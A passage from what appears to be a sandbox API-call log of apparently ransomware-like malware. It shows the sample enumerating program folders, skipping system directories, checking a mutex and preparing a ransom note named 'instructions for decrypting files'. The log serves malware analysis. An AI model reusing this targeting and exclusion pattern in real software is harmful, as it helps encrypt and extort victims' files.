Files\\Common Files\\", cchLength=0x1e | out: lpsz="c:\\program files\\common files\\") returned 0x1e [0104.222] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x18effc, nSize=0x400 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x2d [0104.222] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e79fe8, cbMultiByte=46, lpWideCharStr=0x18e3fc, cchWideChar=2047 | out: lpWideCharStr="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\") returned 46 [0104.222] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\", cchLength=0x1e | out: lpsz="c:\\program files\\common files\\") returned 0x1e [0104.222] GetEnvironmentVariableA (in: lpName="ProgramData", lpBuffer=0x18effc, nSize=0x400 | out: lpBuffer="C:\\ProgramData") returned 0xe [0104.223] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aa48, cbMultiByte=15, lpWideCharStr=0x18e3fc, cchWideChar=2047 | out: lpWideCharStr="c:\\programdata\\jn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\") returned 15 [0104.223] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\", cchLength=0x1e | out: lpsz="c:\\program files\\common files\\") returned 0x1e [0104.223] GetEnvironmentVariableA (in: lpName="WINDIR", lpBuffer=0x18effc, nSize=0x400 | out: lpBuffer="C:\\Windows") returned 0xa [0104.223] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9480, cbMultiByte=11, lpWideCharStr=0x18e3fc, cchWideChar=2047 | out: lpWideCharStr="c:\\windows\\ata\\jn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\") returned 11 [0104.223] GlobalLock (hMem=0x450004) returned 0x58a000 [0104.223] GlobalHandle (pMem=0x58a000) returned 0x450004 [0104.223] GlobalUnlock (hMem=0x450004) returned 0 [0104.223] GlobalLock (hMem=0x450004) returned 0x58a000 [0104.223] GlobalLock (hMem=0x45000c) returned 0x58c010 [0104.223] GlobalHandle (pMem=0x58a000) returned 0x450004 [0104.223] 
GlobalUnlock (hMem=0x450004) returned 0 [0104.223] GlobalHandle (pMem=0x58c010) returned 0x45000c [0104.223] GlobalUnlock (hMem=0x45000c) returned 0 [0104.224] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\", cchLength=0x1e | out: lpsz="c:\\program files\\common files\\") returned 0x1e [0104.224] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aa48, cbMultiByte=15, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr=":\\$recycle.bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\") returned 15 [0104.224] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\", cchLength=0x1e | out: lpsz="c:\\program files\\common files\\") returned 0x1e [0104.224] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=11, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="\\all users\\bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\") returned 11 [0104.224] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\", cchLength=0x1e | out: lpsz="c:\\program files\\common files\\") returned 0x1e [0104.224] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=9, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="\\appdata\\s\\bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\") returned 9 [0104.225] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\", cchLength=0x1e | out: lpsz="c:\\program files\\common files\\") returned 0x1e [0104.225] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aa48, cbMultiByte=18, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="\\application data\\alpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\") returned 18 [0104.225] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\", cchLength=0x1e | out: lpsz="c:\\program files\\common files\\") returned 0x1e [0104.225] MultiByteToWideChar (in: 
CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=28, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr=":\\system volume information\\pdata\\roaming\\eft SQL Server Compact Edition\\") returned 28 [0104.225] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\", cchLength=0x1e | out: lpsz="c:\\program files\\common files\\") returned 0x1e [0104.225] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=10, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr=":\\windows\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\") returned 10 [0104.225] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\", cchLength=0x1e | out: lpsz="c:\\program files\\common files\\") returned 0x1e [0104.226] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=8, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr=":\\intel\\s\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\") returned 8 [0104.226] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\", cchLength=0x1e | out: lpsz="c:\\program files\\common files\\") returned 0x1e [0104.226] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=9, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr=":\\nvidia\\\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\") returned 9 [0104.226] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\", cchLength=0x1e | out: lpsz="c:\\program files\\common files\\") returned 0x1e [0104.226] SHGetMalloc (in: ppMalloc=0x18f44c | out: ppMalloc=0x18f44c*=0x767666bc) returned 0x0 [0104.226] SHGetSpecialFolderLocation (in: hwnd=0x0, csidl=0, ppidl=0x18f448 | out: ppidl=0x18f448) returned 0x0 [0104.227] SHGetPathFromIDListW (in: pidl=0x578208, pszPath=0x57c6b4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0104.228] 
SysReAllocStringLen (in: pbstr=0x18f4d0*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", len=0x25 | out: pbstr=0x18f4d0*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0104.228] IMalloc:Free (This=0x767666bc, pv=0x578208) [0104.228] IUnknown:AddRef (This=0x767666bc) returned 0x1 [0104.228] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", cchLength=0x25 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop") returned 0x25 [0104.228] GlobalLock (hMem=0x45000c) returned 0x58a000 [0104.228] GlobalHandle (pMem=0x58a000) returned 0x45000c [0104.228] GlobalUnlock (hMem=0x45000c) returned 0 [0104.228] GlobalLock (hMem=0x45000c) returned 0x58a000 [0104.228] GlobalLock (hMem=0x450004) returned 0x58c010 [0104.228] GlobalHandle (pMem=0x58a000) returned 0x45000c [0104.228] GlobalUnlock (hMem=0x45000c) returned 0 [0104.228] GlobalHandle (pMem=0x58c010) returned 0x450004 [0104.228] GlobalUnlock (hMem=0x450004) returned 0 [0104.228] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\*.*", lpFindFileData=0x18f524 | out: lpFindFileData=0x18f524*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xdddb7820, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdddb7820, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x587da0 [0104.229] FindNextFileW (in: hFindFile=0x587da0, lpFindFileData=0x18f524 | out: lpFindFileData=0x18f524*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xdddb7820, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdddb7820, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 
[0104.229] FindNextFileW (in: hFindFile=0x587da0, lpFindFileData=0x18f524 | out: lpFindFileData=0x18f524*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69da35f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DESIGNER", cAlternateFileName="")) returned 1 [0104.229] FindNextFileW (in: hFindFile=0x587da0, lpFindFileData=0x18f524 | out: lpFindFileData=0x18f524*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15e5ff70, ftCreationTime.dwHighDateTime=0x1d55fbd, ftLastAccessTime.dwLowDateTime=0x2d722770, ftLastAccessTime.dwHighDateTime=0x1d5af2e, ftLastWriteTime.dwLowDateTime=0x2d722770, ftLastWriteTime.dwHighDateTime=0x1d5af2e, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x0, dwReserved1=0x0, cFileName="flashfxp.exe", cAlternateFileName="")) returned 1 [0104.229] FileTimeToLocalFileTime (in: lpFileTime=0x18f538, lpLocalFileTime=0x18f448 | out: lpLocalFileTime=0x18f448) returned 1 [0104.246] FileTimeToDosDateTime (in: lpFileTime=0x18f448, lpFatDate=0x18f506, lpFatTime=0x18f504 | out: lpFatDate=0x18f506, lpFatTime=0x18f504) returned 1 [0104.246] GlobalLock (hMem=0x450004) returned 0x58a000 [0104.246] GlobalHandle (pMem=0x58a000) returned 0x450004 [0104.246] GlobalUnlock (hMem=0x450004) returned 0 [0104.246] GlobalLock (hMem=0x450004) returned 0x58a000 [0104.246] GlobalLock (hMem=0x45000c) returned 0x58c010 [0104.246] GlobalHandle (pMem=0x58a000) returned 0x450004 [0104.246] GlobalUnlock (hMem=0x450004) returned 0 [0104.246] GlobalHandle (pMem=0x58c010) returned 0x45000c [0104.246] GlobalUnlock (hMem=0x45000c) returned 0 [0104.246] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.247] CharLowerBuffW (in: lpsz="flashfxp.exe", 
cchLength=0xc | out: lpsz="flashfxp.exe") returned 0xc [0104.247] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18e3dc, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eô\x18", lpUsedDefaultChar=0x0) returned 1 [0104.247] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="x", cchWideChar=1, lpMultiByteStr=0x18e3dc, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="xô\x18", lpUsedDefaultChar=0x0) returned 1 [0104.247] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18e3dc, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eô\x18", lpUsedDefaultChar=0x0) returned 1 [0104.247] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18e3dc, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".ô\x18", lpUsedDefaultChar=0x0) returned 1 [0104.247] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x18e3dc, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pô\x18", lpUsedDefaultChar=0x0) returned 1 [0104.247] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="x", cchWideChar=1, lpMultiByteStr=0x18e3dc, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="xô\x18", lpUsedDefaultChar=0x0) returned 1 [0104.247] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x18e3dc, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fô\x18", lpUsedDefaultChar=0x0) returned 1 [0104.247] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="h", cchWideChar=1, lpMultiByteStr=0x18e3dc, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="hô\x18", lpUsedDefaultChar=0x0) returned 1 [0104.247] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x18e3dc, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sô\x18", lpUsedDefaultChar=0x0) returned 1 [0104.247] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="a", cchWideChar=1, lpMultiByteStr=0x18e3dc, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aô\x18", lpUsedDefaultChar=0x0) returned 1 [0104.247] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18e3dc, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lô\x18", lpUsedDefaultChar=0x0) returned 1 [0104.247] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x18e3dc, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fô\x18", lpUsedDefaultChar=0x0) returned 1 [0104.247] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac08, cbMultiByte=36, lpWideCharStr=0x18e3e4, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt\x06") returned 36 [0104.247] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\flashfxp.exe", cchWideChar=42, lpMultiByteStr=0x18e3c0, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\flashfxp.exeò", lpUsedDefaultChar=0x0) returned 42 [0104.247] CharLowerBuffW (in: lpsz=".exe", cchLength=0x4 | out: lpsz=".exe") returned 0x4 [0104.247] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".exe", cchWideChar=4, lpMultiByteStr=0x18e3e4, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".exexeò", lpUsedDefaultChar=0x0) returned 4 [0104.248] FindNextFileW (in: 
hFindFile=0x587da0, lpFindFileData=0x18f524 | out: lpFindFileData=0x18f524*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Shared", cAlternateFileName="MICROS~1")) returned 1 [0104.248] FindNextFileW (in: hFindFile=0x587da0, lpFindFileData=0x18f524 | out: lpFindFileData=0x18f524*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e6d0280, ftCreationTime.dwHighDateTime=0x1d56c07, ftLastAccessTime.dwLowDateTime=0x2b030c20, ftLastAccessTime.dwHighDateTime=0x1d59467, ftLastWriteTime.dwLowDateTime=0x2b030c20, ftLastWriteTime.dwHighDateTime=0x1d59467, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x0, dwReserved1=0x0, cFileName="sat_ipod.exe", cAlternateFileName="")) returned 1 [0104.248] FileTimeToLocalFileTime (in: lpFileTime=0x18f538, lpLocalFileTime=0x18f444 | out: lpLocalFileTime=0x18f444) returned 1 [0104.248] FileTimeToDosDateTime (in: lpFileTime=0x18f444, lpFatDate=0x18f506, lpFatTime=0x18f504 | out: lpFatDate=0x18f506, lpFatTime=0x18f504) returned 1 [0104.248] GlobalLock (hMem=0x45000c) returned 0x58a000 [0104.248] GlobalHandle (pMem=0x58a000) returned 0x45000c [0104.248] GlobalUnlock (hMem=0x45000c) returned 0 [0104.248] GlobalLock (hMem=0x45000c) returned 0x58a000 [0104.248] GlobalLock (hMem=0x450004) returned 0x58c010 [0104.248] GlobalHandle (pMem=0x58a000) returned 0x45000c [0104.248] GlobalUnlock (hMem=0x45000c) returned 0 [0104.248] GlobalHandle (pMem=0x58c010) returned 0x450004 [0104.248] GlobalUnlock (hMem=0x450004) returned 0 [0104.248] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.249] CharLowerBuffW (in: lpsz="sat_ipod.exe", cchLength=0xc | out: 
lpsz="sat_ipod.exe") returned 0xc [0104.249] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18e3dc, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eô\x18", lpUsedDefaultChar=0x0) returned 1 [0104.249] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="x", cchWideChar=1, lpMultiByteStr=0x18e3dc, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="xô\x18", lpUsedDefaultChar=0x0) returned 1 [0104.249] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18e3dc, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eô\x18", lpUsedDefaultChar=0x0) returned 1 [0104.249] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18e3dc, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".ô\x18", lpUsedDefaultChar=0x0) returned 1 [0104.249] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18e3dc, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dô\x18", lpUsedDefaultChar=0x0) returned 1 [0104.249] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x18e3dc, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oô\x18", lpUsedDefaultChar=0x0) returned 1 [0104.249] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x18e3dc, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pô\x18", lpUsedDefaultChar=0x0) returned 1 [0104.249] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x18e3dc, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="iô\x18", 
lpUsedDefaultChar=0x0) returned 1 [0104.249] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="_", cchWideChar=1, lpMultiByteStr=0x18e3dc, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_ô\x18", lpUsedDefaultChar=0x0) returned 1 [0104.249] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x18e3dc, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tô\x18", lpUsedDefaultChar=0x0) returned 1 [0104.249] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="a", cchWideChar=1, lpMultiByteStr=0x18e3dc, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aô\x18", lpUsedDefaultChar=0x0) returned 1 [0104.249] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x18e3dc, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sô\x18", lpUsedDefaultChar=0x0) returned 1 [0104.249] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac78, cbMultiByte=36, lpWideCharStr=0x18e3e4, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt\x06") returned 36 [0104.249] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\sat_ipod.exe", cchWideChar=42, lpMultiByteStr=0x18e3c0, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\sat_ipod.exeò", lpUsedDefaultChar=0x0) returned 42 [0104.249] CharLowerBuffW (in: lpsz=".exe", cchLength=0x4 | out: lpsz=".exe") returned 0x4 [0104.249] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".exe", cchWideChar=4, lpMultiByteStr=0x18e3e4, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".exexeò", lpUsedDefaultChar=0x0) returned 4 [0104.250] FindNextFileW (in: hFindFile=0x587da0, 
lpFindFileData=0x18f524 | out: lpFindFileData=0x18f524*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 1 [0104.250] FindNextFileW (in: hFindFile=0x587da0, lpFindFileData=0x18f524 | out: lpFindFileData=0x18f524*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SpeechEngines", cAlternateFileName="SPEECH~1")) returned 1 [0104.250] FindNextFileW (in: hFindFile=0x587da0, lpFindFileData=0x18f524 | out: lpFindFileData=0x18f524*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System", cAlternateFileName="")) returned 1 [0104.250] FindNextFileW (in: hFindFile=0x587da0, lpFindFileData=0x18f524 | out: lpFindFileData=0x18f524*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System", cAlternateFileName="")) returned 0 [0104.250] 
GetLastError () returned 0x12 [0104.250] FindClose (in: hFindFile=0x587da0 | out: hFindFile=0x587da0) returned 1 [0104.250] GlobalLock (hMem=0x450004) returned 0x58a000 [0104.250] GlobalHandle (pMem=0x58a000) returned 0x450004 [0104.250] GlobalUnlock (hMem=0x450004) returned 0 [0104.250] GlobalLock (hMem=0x450004) returned 0x58a000 [0104.250] GlobalLock (hMem=0x45000c) returned 0x58c010 [0104.250] GlobalHandle (pMem=0x58a000) returned 0x450004 [0104.250] GlobalUnlock (hMem=0x450004) returned 0 [0104.250] GlobalHandle (pMem=0x58c010) returned 0x45000c [0104.250] GlobalUnlock (hMem=0x45000c) returned 0 [0104.250] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\*.*", lpFindFileData=0x18f524 | out: lpFindFileData=0x18f524*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xdddb7820, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdddb7820, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x587da0 [0104.251] FileTimeToLocalFileTime (in: lpFileTime=0x18f538, lpLocalFileTime=0x18f448 | out: lpLocalFileTime=0x18f448) returned 1 [0104.251] FileTimeToDosDateTime (in: lpFileTime=0x18f448, lpFatDate=0x18f506, lpFatTime=0x18f504 | out: lpFatDate=0x18f506, lpFatTime=0x18f504) returned 1 [0104.251] GlobalLock (hMem=0x45000c) returned 0x58a000 [0104.251] GlobalHandle (pMem=0x58a000) returned 0x45000c [0104.251] GlobalUnlock (hMem=0x45000c) returned 0 [0104.251] GlobalLock (hMem=0x45000c) returned 0x58a000 [0104.251] GlobalLock (hMem=0x450004) returned 0x58c010 [0104.251] GlobalHandle (pMem=0x58a000) returned 0x45000c [0104.251] GlobalUnlock (hMem=0x45000c) returned 0 [0104.251] GlobalHandle (pMem=0x58c010) returned 0x450004 [0104.251] GlobalUnlock (hMem=0x450004) returned 0 [0104.251] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, 
lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.251] FindNextFileW (in: hFindFile=0x587da0, lpFindFileData=0x18f524 | out: lpFindFileData=0x18f524*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xdddb7820, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdddb7820, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0104.251] FileTimeToLocalFileTime (in: lpFileTime=0x18f538, lpLocalFileTime=0x18f444 | out: lpLocalFileTime=0x18f444) returned 1 [0104.251] FileTimeToDosDateTime (in: lpFileTime=0x18f444, lpFatDate=0x18f506, lpFatTime=0x18f504 | out: lpFatDate=0x18f506, lpFatTime=0x18f504) returned 1 [0104.251] GlobalLock (hMem=0x450004) returned 0x58a000 [0104.252] GlobalHandle (pMem=0x58a000) returned 0x450004 [0104.252] GlobalUnlock (hMem=0x450004) returned 0 [0104.252] GlobalLock 